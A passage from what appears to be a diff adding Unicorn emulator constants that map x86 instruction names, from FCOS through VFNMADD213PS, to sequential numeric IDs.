+UC_X86_INS_FCOS = 112 +UC_X86_INS_CPUID = 113 +UC_X86_INS_CQO = 114 +UC_X86_INS_CRC32 = 115 +UC_X86_INS_CVTDQ2PD = 116 +UC_X86_INS_CVTDQ2PS = 117 +UC_X86_INS_CVTPD2DQ = 118 +UC_X86_INS_CVTPD2PS = 119 +UC_X86_INS_CVTPS2DQ = 120 +UC_X86_INS_CVTPS2PD = 121 +UC_X86_INS_CVTSD2SI = 122 +UC_X86_INS_CVTSD2SS = 123 +UC_X86_INS_CVTSI2SD = 124 +UC_X86_INS_CVTSI2SS = 125 +UC_X86_INS_CVTSS2SD = 126 +UC_X86_INS_CVTSS2SI = 127 +UC_X86_INS_CVTTPD2DQ = 128 +UC_X86_INS_CVTTPS2DQ = 129 +UC_X86_INS_CVTTSD2SI = 130 +UC_X86_INS_CVTTSS2SI = 131 +UC_X86_INS_CWD = 132 +UC_X86_INS_CWDE = 133 +UC_X86_INS_DAA = 134 +UC_X86_INS_DAS = 135 +UC_X86_INS_DATA16 = 136 +UC_X86_INS_DEC = 137 +UC_X86_INS_DIV = 138 +UC_X86_INS_DIVPD = 139 +UC_X86_INS_DIVPS = 140 +UC_X86_INS_FDIVR = 141 +UC_X86_INS_FIDIVR = 142 +UC_X86_INS_FDIVRP = 143 +UC_X86_INS_DIVSD = 144 +UC_X86_INS_DIVSS = 145 +UC_X86_INS_FDIV = 146 +UC_X86_INS_FIDIV = 147 +UC_X86_INS_FDIVP = 148 
+UC_X86_INS_DPPD = 149 +UC_X86_INS_DPPS = 150 +UC_X86_INS_RET = 151 +UC_X86_INS_ENCLS = 152 +UC_X86_INS_ENCLU = 153 +UC_X86_INS_ENTER = 154 +UC_X86_INS_EXTRACTPS = 155 +UC_X86_INS_EXTRQ = 156 +UC_X86_INS_F2XM1 = 157 +UC_X86_INS_LCALL = 158 +UC_X86_INS_LJMP = 159 +UC_X86_INS_FBLD = 160 +UC_X86_INS_FBSTP = 161 +UC_X86_INS_FCOMPP = 162 +UC_X86_INS_FDECSTP = 163 +UC_X86_INS_FEMMS = 164 +UC_X86_INS_FFREE = 165 +UC_X86_INS_FICOM = 166 +UC_X86_INS_FICOMP = 167 +UC_X86_INS_FINCSTP = 168 +UC_X86_INS_FLDCW = 169 +UC_X86_INS_FLDENV = 170 +UC_X86_INS_FLDL2E = 171 +UC_X86_INS_FLDL2T = 172 +UC_X86_INS_FLDLG2 = 173 +UC_X86_INS_FLDLN2 = 174 +UC_X86_INS_FLDPI = 175 +UC_X86_INS_FNCLEX = 176 +UC_X86_INS_FNINIT = 177 +UC_X86_INS_FNOP = 178 +UC_X86_INS_FNSTCW = 179 +UC_X86_INS_FNSTSW = 180 +UC_X86_INS_FPATAN = 181 +UC_X86_INS_FPREM = 182 +UC_X86_INS_FPREM1 = 183 +UC_X86_INS_FPTAN = 184 +UC_X86_INS_FFREEP = 185 +UC_X86_INS_FRNDINT = 186 +UC_X86_INS_FRSTOR = 187 +UC_X86_INS_FNSAVE = 188 +UC_X86_INS_FSCALE = 189 +UC_X86_INS_FSETPM = 190 +UC_X86_INS_FSINCOS = 191 +UC_X86_INS_FNSTENV = 192 +UC_X86_INS_FXAM = 193 +UC_X86_INS_FXRSTOR = 194 +UC_X86_INS_FXRSTOR64 = 195 +UC_X86_INS_FXSAVE = 196 +UC_X86_INS_FXSAVE64 = 197 +UC_X86_INS_FXTRACT = 198 +UC_X86_INS_FYL2X = 199 +UC_X86_INS_FYL2XP1 = 200 +UC_X86_INS_MOVAPD = 201 +UC_X86_INS_MOVAPS = 202 +UC_X86_INS_ORPD = 203 +UC_X86_INS_ORPS = 204 +UC_X86_INS_VMOVAPD = 205 +UC_X86_INS_VMOVAPS = 206 +UC_X86_INS_XORPD = 207 +UC_X86_INS_XORPS = 208 +UC_X86_INS_GETSEC = 209 +UC_X86_INS_HADDPD = 210 +UC_X86_INS_HADDPS = 211 +UC_X86_INS_HLT = 212 +UC_X86_INS_HSUBPD = 213 +UC_X86_INS_HSUBPS = 214 +UC_X86_INS_IDIV = 215 +UC_X86_INS_FILD = 216 +UC_X86_INS_IMUL = 217 +UC_X86_INS_IN = 218 +UC_X86_INS_INC = 219 +UC_X86_INS_INSB = 220 +UC_X86_INS_INSERTPS = 221 +UC_X86_INS_INSERTQ = 222 +UC_X86_INS_INSD = 223 +UC_X86_INS_INSW = 224 +UC_X86_INS_INT = 225 +UC_X86_INS_INT1 = 226 +UC_X86_INS_INT3 = 227 +UC_X86_INS_INTO = 228 +UC_X86_INS_INVD = 229 +UC_X86_INS_INVEPT = 
230 +UC_X86_INS_INVLPG = 231 +UC_X86_INS_INVLPGA = 232 +UC_X86_INS_INVPCID = 233 +UC_X86_INS_INVVPID = 234 +UC_X86_INS_IRET = 235 +UC_X86_INS_IRETD = 236 +UC_X86_INS_IRETQ = 237 +UC_X86_INS_FISTTP = 238 +UC_X86_INS_FIST = 239 +UC_X86_INS_FISTP = 240 +UC_X86_INS_UCOMISD = 241 +UC_X86_INS_UCOMISS = 242 +UC_X86_INS_VCOMISD = 243 +UC_X86_INS_VCOMISS = 244 +UC_X86_INS_VCVTSD2SS = 245 +UC_X86_INS_VCVTSI2SD = 246 +UC_X86_INS_VCVTSI2SS = 247 +UC_X86_INS_VCVTSS2SD = 248 +UC_X86_INS_VCVTTSD2SI = 249 +UC_X86_INS_VCVTTSD2USI = 250 +UC_X86_INS_VCVTTSS2SI = 251 +UC_X86_INS_VCVTTSS2USI = 252 +UC_X86_INS_VCVTUSI2SD = 253 +UC_X86_INS_VCVTUSI2SS = 254 +UC_X86_INS_VUCOMISD = 255 +UC_X86_INS_VUCOMISS = 256 +UC_X86_INS_JAE = 257 +UC_X86_INS_JA = 258 +UC_X86_INS_JBE = 259 +UC_X86_INS_JB = 260 +UC_X86_INS_JCXZ = 261 +UC_X86_INS_JECXZ = 262 +UC_X86_INS_JE = 263 +UC_X86_INS_JGE = 264 +UC_X86_INS_JG = 265 +UC_X86_INS_JLE = 266 +UC_X86_INS_JL = 267 +UC_X86_INS_JMP = 268 +UC_X86_INS_JNE = 269 +UC_X86_INS_JNO = 270 +UC_X86_INS_JNP = 271 +UC_X86_INS_JNS = 272 +UC_X86_INS_JO = 273 +UC_X86_INS_JP = 274 +UC_X86_INS_JRCXZ = 275 +UC_X86_INS_JS = 276 +UC_X86_INS_KANDB = 277 +UC_X86_INS_KANDD = 278 +UC_X86_INS_KANDNB = 279 +UC_X86_INS_KANDND = 280 +UC_X86_INS_KANDNQ = 281 +UC_X86_INS_KANDNW = 282 +UC_X86_INS_KANDQ = 283 +UC_X86_INS_KANDW = 284 +UC_X86_INS_KMOVB = 285 +UC_X86_INS_KMOVD = 286 +UC_X86_INS_KMOVQ = 287 +UC_X86_INS_KMOVW = 288 +UC_X86_INS_KNOTB = 289 +UC_X86_INS_KNOTD = 290 +UC_X86_INS_KNOTQ = 291 +UC_X86_INS_KNOTW = 292 +UC_X86_INS_KORB = 293 +UC_X86_INS_KORD = 294 +UC_X86_INS_KORQ = 295 +UC_X86_INS_KORTESTB = 296 +UC_X86_INS_KORTESTD = 297 +UC_X86_INS_KORTESTQ = 298 +UC_X86_INS_KORTESTW = 299 +UC_X86_INS_KORW = 300 +UC_X86_INS_KSHIFTLB = 301 +UC_X86_INS_KSHIFTLD = 302 +UC_X86_INS_KSHIFTLQ = 303 +UC_X86_INS_KSHIFTLW = 304 +UC_X86_INS_KSHIFTRB = 305 +UC_X86_INS_KSHIFTRD = 306 +UC_X86_INS_KSHIFTRQ = 307 +UC_X86_INS_KSHIFTRW = 308 +UC_X86_INS_KUNPCKBW = 309 +UC_X86_INS_KXNORB = 310 
+UC_X86_INS_KXNORD = 311 +UC_X86_INS_KXNORQ = 312 +UC_X86_INS_KXNORW = 313 +UC_X86_INS_KXORB = 314 +UC_X86_INS_KXORD = 315 +UC_X86_INS_KXORQ = 316 +UC_X86_INS_KXORW = 317 +UC_X86_INS_LAHF = 318 +UC_X86_INS_LAR = 319 +UC_X86_INS_LDDQU = 320 +UC_X86_INS_LDMXCSR = 321 +UC_X86_INS_LDS = 322 +UC_X86_INS_FLDZ = 323 +UC_X86_INS_FLD1 = 324 +UC_X86_INS_FLD = 325 +UC_X86_INS_LEA = 326 +UC_X86_INS_LEAVE = 327 +UC_X86_INS_LES = 328 +UC_X86_INS_LFENCE = 329 +UC_X86_INS_LFS = 330 +UC_X86_INS_LGDT = 331 +UC_X86_INS_LGS = 332 +UC_X86_INS_LIDT = 333 +UC_X86_INS_LLDT = 334 +UC_X86_INS_LMSW = 335 +UC_X86_INS_OR = 336 +UC_X86_INS_SUB = 337 +UC_X86_INS_XOR = 338 +UC_X86_INS_LODSB = 339 +UC_X86_INS_LODSD = 340 +UC_X86_INS_LODSQ = 341 +UC_X86_INS_LODSW = 342 +UC_X86_INS_LOOP = 343 +UC_X86_INS_LOOPE = 344 +UC_X86_INS_LOOPNE = 345 +UC_X86_INS_RETF = 346 +UC_X86_INS_RETFQ = 347 +UC_X86_INS_LSL = 348 +UC_X86_INS_LSS = 349 +UC_X86_INS_LTR = 350 +UC_X86_INS_XADD = 351 +UC_X86_INS_LZCNT = 352 +UC_X86_INS_MASKMOVDQU = 353 +UC_X86_INS_MAXPD = 354 +UC_X86_INS_MAXPS = 355 +UC_X86_INS_MAXSD = 356 +UC_X86_INS_MAXSS = 357 +UC_X86_INS_MFENCE = 358 +UC_X86_INS_MINPD = 359 +UC_X86_INS_MINPS = 360 +UC_X86_INS_MINSD = 361 +UC_X86_INS_MINSS = 362 +UC_X86_INS_CVTPD2PI = 363 +UC_X86_INS_CVTPI2PD = 364 +UC_X86_INS_CVTPI2PS = 365 +UC_X86_INS_CVTPS2PI = 366 +UC_X86_INS_CVTTPD2PI = 367 +UC_X86_INS_CVTTPS2PI = 368 +UC_X86_INS_EMMS = 369 +UC_X86_INS_MASKMOVQ = 370 +UC_X86_INS_MOVD = 371 +UC_X86_INS_MOVDQ2Q = 372 +UC_X86_INS_MOVNTQ = 373 +UC_X86_INS_MOVQ2DQ = 374 +UC_X86_INS_MOVQ = 375 +UC_X86_INS_PABSB = 376 +UC_X86_INS_PABSD = 377 +UC_X86_INS_PABSW = 378 +UC_X86_INS_PACKSSDW = 379 +UC_X86_INS_PACKSSWB = 380 +UC_X86_INS_PACKUSWB = 381 +UC_X86_INS_PADDB = 382 +UC_X86_INS_PADDD = 383 +UC_X86_INS_PADDQ = 384 +UC_X86_INS_PADDSB = 385 +UC_X86_INS_PADDSW = 386 +UC_X86_INS_PADDUSB = 387 +UC_X86_INS_PADDUSW = 388 +UC_X86_INS_PADDW = 389 +UC_X86_INS_PALIGNR = 390 +UC_X86_INS_PANDN = 391 +UC_X86_INS_PAND = 392 
+UC_X86_INS_PAVGB = 393 +UC_X86_INS_PAVGW = 394 +UC_X86_INS_PCMPEQB = 395 +UC_X86_INS_PCMPEQD = 396 +UC_X86_INS_PCMPEQW = 397 +UC_X86_INS_PCMPGTB = 398 +UC_X86_INS_PCMPGTD = 399 +UC_X86_INS_PCMPGTW = 400 +UC_X86_INS_PEXTRW = 401 +UC_X86_INS_PHADDSW = 402 +UC_X86_INS_PHADDW = 403 +UC_X86_INS_PHADDD = 404 +UC_X86_INS_PHSUBD = 405 +UC_X86_INS_PHSUBSW = 406 +UC_X86_INS_PHSUBW = 407 +UC_X86_INS_PINSRW = 408 +UC_X86_INS_PMADDUBSW = 409 +UC_X86_INS_PMADDWD = 410 +UC_X86_INS_PMAXSW = 411 +UC_X86_INS_PMAXUB = 412 +UC_X86_INS_PMINSW = 413 +UC_X86_INS_PMINUB = 414 +UC_X86_INS_PMOVMSKB = 415 +UC_X86_INS_PMULHRSW = 416 +UC_X86_INS_PMULHUW = 417 +UC_X86_INS_PMULHW = 418 +UC_X86_INS_PMULLW = 419 +UC_X86_INS_PMULUDQ = 420 +UC_X86_INS_POR = 421 +UC_X86_INS_PSADBW = 422 +UC_X86_INS_PSHUFB = 423 +UC_X86_INS_PSHUFW = 424 +UC_X86_INS_PSIGNB = 425 +UC_X86_INS_PSIGND = 426 +UC_X86_INS_PSIGNW = 427 +UC_X86_INS_PSLLD = 428 +UC_X86_INS_PSLLQ = 429 +UC_X86_INS_PSLLW = 430 +UC_X86_INS_PSRAD = 431 +UC_X86_INS_PSRAW = 432 +UC_X86_INS_PSRLD = 433 +UC_X86_INS_PSRLQ = 434 +UC_X86_INS_PSRLW = 435 +UC_X86_INS_PSUBB = 436 +UC_X86_INS_PSUBD = 437 +UC_X86_INS_PSUBQ = 438 +UC_X86_INS_PSUBSB = 439 +UC_X86_INS_PSUBSW = 440 +UC_X86_INS_PSUBUSB = 441 +UC_X86_INS_PSUBUSW = 442 +UC_X86_INS_PSUBW = 443 +UC_X86_INS_PUNPCKHBW = 444 +UC_X86_INS_PUNPCKHDQ = 445 +UC_X86_INS_PUNPCKHWD = 446 +UC_X86_INS_PUNPCKLBW = 447 +UC_X86_INS_PUNPCKLDQ = 448 +UC_X86_INS_PUNPCKLWD = 449 +UC_X86_INS_PXOR = 450 +UC_X86_INS_MONITOR = 451 +UC_X86_INS_MONTMUL = 452 +UC_X86_INS_MOV = 453 +UC_X86_INS_MOVABS = 454 +UC_X86_INS_MOVBE = 455 +UC_X86_INS_MOVDDUP = 456 +UC_X86_INS_MOVDQA = 457 +UC_X86_INS_MOVDQU = 458 +UC_X86_INS_MOVHLPS = 459 +UC_X86_INS_MOVHPD = 460 +UC_X86_INS_MOVHPS = 461 +UC_X86_INS_MOVLHPS = 462 +UC_X86_INS_MOVLPD = 463 +UC_X86_INS_MOVLPS = 464 +UC_X86_INS_MOVMSKPD = 465 +UC_X86_INS_MOVMSKPS = 466 +UC_X86_INS_MOVNTDQA = 467 +UC_X86_INS_MOVNTDQ = 468 +UC_X86_INS_MOVNTI = 469 +UC_X86_INS_MOVNTPD = 470 +UC_X86_INS_MOVNTPS = 
471 +UC_X86_INS_MOVNTSD = 472 +UC_X86_INS_MOVNTSS = 473 +UC_X86_INS_MOVSB = 474 +UC_X86_INS_MOVSD = 475 +UC_X86_INS_MOVSHDUP = 476 +UC_X86_INS_MOVSLDUP = 477 +UC_X86_INS_MOVSQ = 478 +UC_X86_INS_MOVSS = 479 +UC_X86_INS_MOVSW = 480 +UC_X86_INS_MOVSX = 481 +UC_X86_INS_MOVSXD = 482 +UC_X86_INS_MOVUPD = 483 +UC_X86_INS_MOVUPS = 484 +UC_X86_INS_MOVZX = 485 +UC_X86_INS_MPSADBW = 486 +UC_X86_INS_MUL = 487 +UC_X86_INS_MULPD = 488 +UC_X86_INS_MULPS = 489 +UC_X86_INS_MULSD = 490 +UC_X86_INS_MULSS = 491 +UC_X86_INS_MULX = 492 +UC_X86_INS_FMUL = 493 +UC_X86_INS_FIMUL = 494 +UC_X86_INS_FMULP = 495 +UC_X86_INS_MWAIT = 496 +UC_X86_INS_NEG = 497 +UC_X86_INS_NOP = 498 +UC_X86_INS_NOT = 499 +UC_X86_INS_OUT = 500 +UC_X86_INS_OUTSB = 501 +UC_X86_INS_OUTSD = 502 +UC_X86_INS_OUTSW = 503 +UC_X86_INS_PACKUSDW = 504 +UC_X86_INS_PAUSE = 505 +UC_X86_INS_PAVGUSB = 506 +UC_X86_INS_PBLENDVB = 507 +UC_X86_INS_PBLENDW = 508 +UC_X86_INS_PCLMULQDQ = 509 +UC_X86_INS_PCMPEQQ = 510 +UC_X86_INS_PCMPESTRI = 511 +UC_X86_INS_PCMPESTRM = 512 +UC_X86_INS_PCMPGTQ = 513 +UC_X86_INS_PCMPISTRI = 514 +UC_X86_INS_PCMPISTRM = 515 +UC_X86_INS_PCOMMIT = 516 +UC_X86_INS_PDEP = 517 +UC_X86_INS_PEXT = 518 +UC_X86_INS_PEXTRB = 519 +UC_X86_INS_PEXTRD = 520 +UC_X86_INS_PEXTRQ = 521 +UC_X86_INS_PF2ID = 522 +UC_X86_INS_PF2IW = 523 +UC_X86_INS_PFACC = 524 +UC_X86_INS_PFADD = 525 +UC_X86_INS_PFCMPEQ = 526 +UC_X86_INS_PFCMPGE = 527 +UC_X86_INS_PFCMPGT = 528 +UC_X86_INS_PFMAX = 529 +UC_X86_INS_PFMIN = 530 +UC_X86_INS_PFMUL = 531 +UC_X86_INS_PFNACC = 532 +UC_X86_INS_PFPNACC = 533 +UC_X86_INS_PFRCPIT1 = 534 +UC_X86_INS_PFRCPIT2 = 535 +UC_X86_INS_PFRCP = 536 +UC_X86_INS_PFRSQIT1 = 537 +UC_X86_INS_PFRSQRT = 538 +UC_X86_INS_PFSUBR = 539 +UC_X86_INS_PFSUB = 540 +UC_X86_INS_PHMINPOSUW = 541 +UC_X86_INS_PI2FD = 542 +UC_X86_INS_PI2FW = 543 +UC_X86_INS_PINSRB = 544 +UC_X86_INS_PINSRD = 545 +UC_X86_INS_PINSRQ = 546 +UC_X86_INS_PMAXSB = 547 +UC_X86_INS_PMAXSD = 548 +UC_X86_INS_PMAXUD = 549 +UC_X86_INS_PMAXUW = 550 +UC_X86_INS_PMINSB = 551 
+UC_X86_INS_PMINSD = 552 +UC_X86_INS_PMINUD = 553 +UC_X86_INS_PMINUW = 554 +UC_X86_INS_PMOVSXBD = 555 +UC_X86_INS_PMOVSXBQ = 556 +UC_X86_INS_PMOVSXBW = 557 +UC_X86_INS_PMOVSXDQ = 558 +UC_X86_INS_PMOVSXWD = 559 +UC_X86_INS_PMOVSXWQ = 560 +UC_X86_INS_PMOVZXBD = 561 +UC_X86_INS_PMOVZXBQ = 562 +UC_X86_INS_PMOVZXBW = 563 +UC_X86_INS_PMOVZXDQ = 564 +UC_X86_INS_PMOVZXWD = 565 +UC_X86_INS_PMOVZXWQ = 566 +UC_X86_INS_PMULDQ = 567 +UC_X86_INS_PMULHRW = 568 +UC_X86_INS_PMULLD = 569 +UC_X86_INS_POP = 570 +UC_X86_INS_POPAW = 571 +UC_X86_INS_POPAL = 572 +UC_X86_INS_POPCNT = 573 +UC_X86_INS_POPF = 574 +UC_X86_INS_POPFD = 575 +UC_X86_INS_POPFQ = 576 +UC_X86_INS_PREFETCH = 577 +UC_X86_INS_PREFETCHNTA = 578 +UC_X86_INS_PREFETCHT0 = 579 +UC_X86_INS_PREFETCHT1 = 580 +UC_X86_INS_PREFETCHT2 = 581 +UC_X86_INS_PREFETCHW = 582 +UC_X86_INS_PSHUFD = 583 +UC_X86_INS_PSHUFHW = 584 +UC_X86_INS_PSHUFLW = 585 +UC_X86_INS_PSLLDQ = 586 +UC_X86_INS_PSRLDQ = 587 +UC_X86_INS_PSWAPD = 588 +UC_X86_INS_PTEST = 589 +UC_X86_INS_PUNPCKHQDQ = 590 +UC_X86_INS_PUNPCKLQDQ = 591 +UC_X86_INS_PUSH = 592 +UC_X86_INS_PUSHAW = 593 +UC_X86_INS_PUSHAL = 594 +UC_X86_INS_PUSHF = 595 +UC_X86_INS_PUSHFD = 596 +UC_X86_INS_PUSHFQ = 597 +UC_X86_INS_RCL = 598 +UC_X86_INS_RCPPS = 599 +UC_X86_INS_RCPSS = 600 +UC_X86_INS_RCR = 601 +UC_X86_INS_RDFSBASE = 602 +UC_X86_INS_RDGSBASE = 603 +UC_X86_INS_RDMSR = 604 +UC_X86_INS_RDPMC = 605 +UC_X86_INS_RDRAND = 606 +UC_X86_INS_RDSEED = 607 +UC_X86_INS_RDTSC = 608 +UC_X86_INS_RDTSCP = 609 +UC_X86_INS_ROL = 610 +UC_X86_INS_ROR = 611 +UC_X86_INS_RORX = 612 +UC_X86_INS_ROUNDPD = 613 +UC_X86_INS_ROUNDPS = 614 +UC_X86_INS_ROUNDSD = 615 +UC_X86_INS_ROUNDSS = 616 +UC_X86_INS_RSM = 617 +UC_X86_INS_RSQRTPS = 618 +UC_X86_INS_RSQRTSS = 619 +UC_X86_INS_SAHF = 620 +UC_X86_INS_SAL = 621 +UC_X86_INS_SALC = 622 +UC_X86_INS_SAR = 623 +UC_X86_INS_SARX = 624 +UC_X86_INS_SBB = 625 +UC_X86_INS_SCASB = 626 +UC_X86_INS_SCASD = 627 +UC_X86_INS_SCASQ = 628 +UC_X86_INS_SCASW = 629 +UC_X86_INS_SETAE = 630 
+UC_X86_INS_SETA = 631 +UC_X86_INS_SETBE = 632 +UC_X86_INS_SETB = 633 +UC_X86_INS_SETE = 634 +UC_X86_INS_SETGE = 635 +UC_X86_INS_SETG = 636 +UC_X86_INS_SETLE = 637 +UC_X86_INS_SETL = 638 +UC_X86_INS_SETNE = 639 +UC_X86_INS_SETNO = 640 +UC_X86_INS_SETNP = 641 +UC_X86_INS_SETNS = 642 +UC_X86_INS_SETO = 643 +UC_X86_INS_SETP = 644 +UC_X86_INS_SETS = 645 +UC_X86_INS_SFENCE = 646 +UC_X86_INS_SGDT = 647 +UC_X86_INS_SHA1MSG1 = 648 +UC_X86_INS_SHA1MSG2 = 649 +UC_X86_INS_SHA1NEXTE = 650 +UC_X86_INS_SHA1RNDS4 = 651 +UC_X86_INS_SHA256MSG1 = 652 +UC_X86_INS_SHA256MSG2 = 653 +UC_X86_INS_SHA256RNDS2 = 654 +UC_X86_INS_SHL = 655 +UC_X86_INS_SHLD = 656 +UC_X86_INS_SHLX = 657 +UC_X86_INS_SHR = 658 +UC_X86_INS_SHRD = 659 +UC_X86_INS_SHRX = 660 +UC_X86_INS_SHUFPD = 661 +UC_X86_INS_SHUFPS = 662 +UC_X86_INS_SIDT = 663 +UC_X86_INS_FSIN = 664 +UC_X86_INS_SKINIT = 665 +UC_X86_INS_SLDT = 666 +UC_X86_INS_SMSW = 667 +UC_X86_INS_SQRTPD = 668 +UC_X86_INS_SQRTPS = 669 +UC_X86_INS_SQRTSD = 670 +UC_X86_INS_SQRTSS = 671 +UC_X86_INS_FSQRT = 672 +UC_X86_INS_STAC = 673 +UC_X86_INS_STC = 674 +UC_X86_INS_STD = 675 +UC_X86_INS_STGI = 676 +UC_X86_INS_STI = 677 +UC_X86_INS_STMXCSR = 678 +UC_X86_INS_STOSB = 679 +UC_X86_INS_STOSD = 680 +UC_X86_INS_STOSQ = 681 +UC_X86_INS_STOSW = 682 +UC_X86_INS_STR = 683 +UC_X86_INS_FST = 684 +UC_X86_INS_FSTP = 685 +UC_X86_INS_FSTPNCE = 686 +UC_X86_INS_FXCH = 687 +UC_X86_INS_SUBPD = 688 +UC_X86_INS_SUBPS = 689 +UC_X86_INS_FSUBR = 690 +UC_X86_INS_FISUBR = 691 +UC_X86_INS_FSUBRP = 692 +UC_X86_INS_SUBSD = 693 +UC_X86_INS_SUBSS = 694 +UC_X86_INS_FSUB = 695 +UC_X86_INS_FISUB = 696 +UC_X86_INS_FSUBP = 697 +UC_X86_INS_SWAPGS = 698 +UC_X86_INS_SYSCALL = 699 +UC_X86_INS_SYSENTER = 700 +UC_X86_INS_SYSEXIT = 701 +UC_X86_INS_SYSRET = 702 +UC_X86_INS_T1MSKC = 703 +UC_X86_INS_TEST = 704 +UC_X86_INS_UD2 = 705 +UC_X86_INS_FTST = 706 +UC_X86_INS_TZCNT = 707 +UC_X86_INS_TZMSK = 708 +UC_X86_INS_FUCOMPI = 709 +UC_X86_INS_FUCOMI = 710 +UC_X86_INS_FUCOMPP = 711 +UC_X86_INS_FUCOMP = 712 
+UC_X86_INS_FUCOM = 713 +UC_X86_INS_UD2B = 714 +UC_X86_INS_UNPCKHPD = 715 +UC_X86_INS_UNPCKHPS = 716 +UC_X86_INS_UNPCKLPD = 717 +UC_X86_INS_UNPCKLPS = 718 +UC_X86_INS_VADDPD = 719 +UC_X86_INS_VADDPS = 720 +UC_X86_INS_VADDSD = 721 +UC_X86_INS_VADDSS = 722 +UC_X86_INS_VADDSUBPD = 723 +UC_X86_INS_VADDSUBPS = 724 +UC_X86_INS_VAESDECLAST = 725 +UC_X86_INS_VAESDEC = 726 +UC_X86_INS_VAESENCLAST = 727 +UC_X86_INS_VAESENC = 728 +UC_X86_INS_VAESIMC = 729 +UC_X86_INS_VAESKEYGENASSIST = 730 +UC_X86_INS_VALIGND = 731 +UC_X86_INS_VALIGNQ = 732 +UC_X86_INS_VANDNPD = 733 +UC_X86_INS_VANDNPS = 734 +UC_X86_INS_VANDPD = 735 +UC_X86_INS_VANDPS = 736 +UC_X86_INS_VBLENDMPD = 737 +UC_X86_INS_VBLENDMPS = 738 +UC_X86_INS_VBLENDPD = 739 +UC_X86_INS_VBLENDPS = 740 +UC_X86_INS_VBLENDVPD = 741 +UC_X86_INS_VBLENDVPS = 742 +UC_X86_INS_VBROADCASTF128 = 743 +UC_X86_INS_VBROADCASTI32X4 = 744 +UC_X86_INS_VBROADCASTI64X4 = 745 +UC_X86_INS_VBROADCASTSD = 746 +UC_X86_INS_VBROADCASTSS = 747 +UC_X86_INS_VCMPPD = 748 +UC_X86_INS_VCMPPS = 749 +UC_X86_INS_VCMPSD = 750 +UC_X86_INS_VCMPSS = 751 +UC_X86_INS_VCOMPRESSPD = 752 +UC_X86_INS_VCOMPRESSPS = 753 +UC_X86_INS_VCVTDQ2PD = 754 +UC_X86_INS_VCVTDQ2PS = 755 +UC_X86_INS_VCVTPD2DQX = 756 +UC_X86_INS_VCVTPD2DQ = 757 +UC_X86_INS_VCVTPD2PSX = 758 +UC_X86_INS_VCVTPD2PS = 759 +UC_X86_INS_VCVTPD2UDQ = 760 +UC_X86_INS_VCVTPH2PS = 761 +UC_X86_INS_VCVTPS2DQ = 762 +UC_X86_INS_VCVTPS2PD = 763 +UC_X86_INS_VCVTPS2PH = 764 +UC_X86_INS_VCVTPS2UDQ = 765 +UC_X86_INS_VCVTSD2SI = 766 +UC_X86_INS_VCVTSD2USI = 767 +UC_X86_INS_VCVTSS2SI = 768 +UC_X86_INS_VCVTSS2USI = 769 +UC_X86_INS_VCVTTPD2DQX = 770 +UC_X86_INS_VCVTTPD2DQ = 771 +UC_X86_INS_VCVTTPD2UDQ = 772 +UC_X86_INS_VCVTTPS2DQ = 773 +UC_X86_INS_VCVTTPS2UDQ = 774 +UC_X86_INS_VCVTUDQ2PD = 775 +UC_X86_INS_VCVTUDQ2PS = 776 +UC_X86_INS_VDIVPD = 777 +UC_X86_INS_VDIVPS = 778 +UC_X86_INS_VDIVSD = 779 +UC_X86_INS_VDIVSS = 780 +UC_X86_INS_VDPPD = 781 +UC_X86_INS_VDPPS = 782 +UC_X86_INS_VERR = 783 +UC_X86_INS_VERW = 784 
+UC_X86_INS_VEXP2PD = 785 +UC_X86_INS_VEXP2PS = 786 +UC_X86_INS_VEXPANDPD = 787 +UC_X86_INS_VEXPANDPS = 788 +UC_X86_INS_VEXTRACTF128 = 789 +UC_X86_INS_VEXTRACTF32X4 = 790 +UC_X86_INS_VEXTRACTF64X4 = 791 +UC_X86_INS_VEXTRACTI128 = 792 +UC_X86_INS_VEXTRACTI32X4 = 793 +UC_X86_INS_VEXTRACTI64X4 = 794 +UC_X86_INS_VEXTRACTPS = 795 +UC_X86_INS_VFMADD132PD = 796 +UC_X86_INS_VFMADD132PS = 797 +UC_X86_INS_VFMADDPD = 798 +UC_X86_INS_VFMADD213PD = 799 +UC_X86_INS_VFMADD231PD = 800 +UC_X86_INS_VFMADDPS = 801 +UC_X86_INS_VFMADD213PS = 802 +UC_X86_INS_VFMADD231PS = 803 +UC_X86_INS_VFMADDSD = 804 +UC_X86_INS_VFMADD213SD = 805 +UC_X86_INS_VFMADD132SD = 806 +UC_X86_INS_VFMADD231SD = 807 +UC_X86_INS_VFMADDSS = 808 +UC_X86_INS_VFMADD213SS = 809 +UC_X86_INS_VFMADD132SS = 810 +UC_X86_INS_VFMADD231SS = 811 +UC_X86_INS_VFMADDSUB132PD = 812 +UC_X86_INS_VFMADDSUB132PS = 813 +UC_X86_INS_VFMADDSUBPD = 814 +UC_X86_INS_VFMADDSUB213PD = 815 +UC_X86_INS_VFMADDSUB231PD = 816 +UC_X86_INS_VFMADDSUBPS = 817 +UC_X86_INS_VFMADDSUB213PS = 818 +UC_X86_INS_VFMADDSUB231PS = 819 +UC_X86_INS_VFMSUB132PD = 820 +UC_X86_INS_VFMSUB132PS = 821 +UC_X86_INS_VFMSUBADD132PD = 822 +UC_X86_INS_VFMSUBADD132PS = 823 +UC_X86_INS_VFMSUBADDPD = 824 +UC_X86_INS_VFMSUBADD213PD = 825 +UC_X86_INS_VFMSUBADD231PD = 826 +UC_X86_INS_VFMSUBADDPS = 827 +UC_X86_INS_VFMSUBADD213PS = 828 +UC_X86_INS_VFMSUBADD231PS = 829 +UC_X86_INS_VFMSUBPD = 830 +UC_X86_INS_VFMSUB213PD = 831 +UC_X86_INS_VFMSUB231PD = 832 +UC_X86_INS_VFMSUBPS = 833 +UC_X86_INS_VFMSUB213PS = 834 +UC_X86_INS_VFMSUB231PS = 835 +UC_X86_INS_VFMSUBSD = 836 +UC_X86_INS_VFMSUB213SD = 837 +UC_X86_INS_VFMSUB132SD = 838 +UC_X86_INS_VFMSUB231SD = 839 +UC_X86_INS_VFMSUBSS = 840 +UC_X86_INS_VFMSUB213SS = 841 +UC_X86_INS_VFMSUB132SS = 842 +UC_X86_INS_VFMSUB231SS = 843 +UC_X86_INS_VFNMADD132PD = 844 +UC_X86_INS_VFNMADD132PS = 845 +UC_X86_INS_VFNMADDPD = 846 +UC_X86_INS_VFNMADD213PD = 847 +UC_X86_INS_VFNMADD231PD = 848 +UC_X86_INS_VFNMADDPS = 849 +UC_X86_INS_VFNMADD213PS = 850 
